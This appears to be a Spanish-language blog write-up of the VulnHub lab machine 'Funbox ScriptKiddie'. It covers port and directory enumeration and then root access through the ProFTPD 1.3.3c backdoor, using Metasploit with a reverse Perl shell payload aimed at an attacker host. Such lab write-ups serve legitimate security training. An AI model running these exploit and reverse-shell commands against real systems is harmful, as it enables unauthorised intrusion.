cd ~/blog

~/writeups/vulnhub/17-funbox-scriptkiddie.md

17 - Funbox ScriptKiddie

easy Linux vulnhub 11-10-2023
ProFTPD 1.3.3c backdoor RCE (OSVDB-69562)
www.vulnhub.com/entry/funbox-scriptkiddie,725/

~1 min de lectura


Enumeramos puertos: FTP ProFTPD 1.3.3c, SSH, SMTP, HTTP (WordPress 5.7.2), POP3/IMAP, Samba:

 nmap -sC -sV -p21,22,25,80,110,139,143,445 -oN 02-targeted 192.168.1.53
...
21/tcp  open  ftp         ProFTPD 1.3.3c
80/tcp  open  http        Apache 2.4.18 / WordPress 5.7.2
...

Al acceder al sitio, el enlace "Funbox: Scriptkiddie" redirige a http://funbox11, así que lo añadimos a /etc/hosts para que cargue la página completa. Enumeramos directorios con gobuster, pero solo aparecen las rutas típicas de WordPress (wp-login.php, wp-admin, wp-includes…), nada aprovechable:

 echo "192.168.1.53 funbox11" | sudo tee -a /etc/hosts
 gobuster dir -r --url http://192.168.1.53 --wordlist .../directory-list-2.3-big.txt -x php,html,txt
/wp-login.php   /wp-admin   /wp-includes   /readme.html   ...

Volviendo al resultado de nmap, ProFTPD 1.3.3c tiene el famoso backdoor RCE (de ahí el nombre "scriptkiddie", se resuelve con Metasploit):

 searchsploit ProFTPD 1.3.3c

Lo explotamos con Metasploit, que da una shell root directa:

msf> use exploit/unix/ftp/proftpd_133c_backdoor
msf> set payload cmd/unix/reverse_perl
msf> set rhosts 192.168.1.53
msf> set lhost <atacante>
msf> exploit

La máquina tiene una sola flag (un banner ASCII de "FunBox").

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados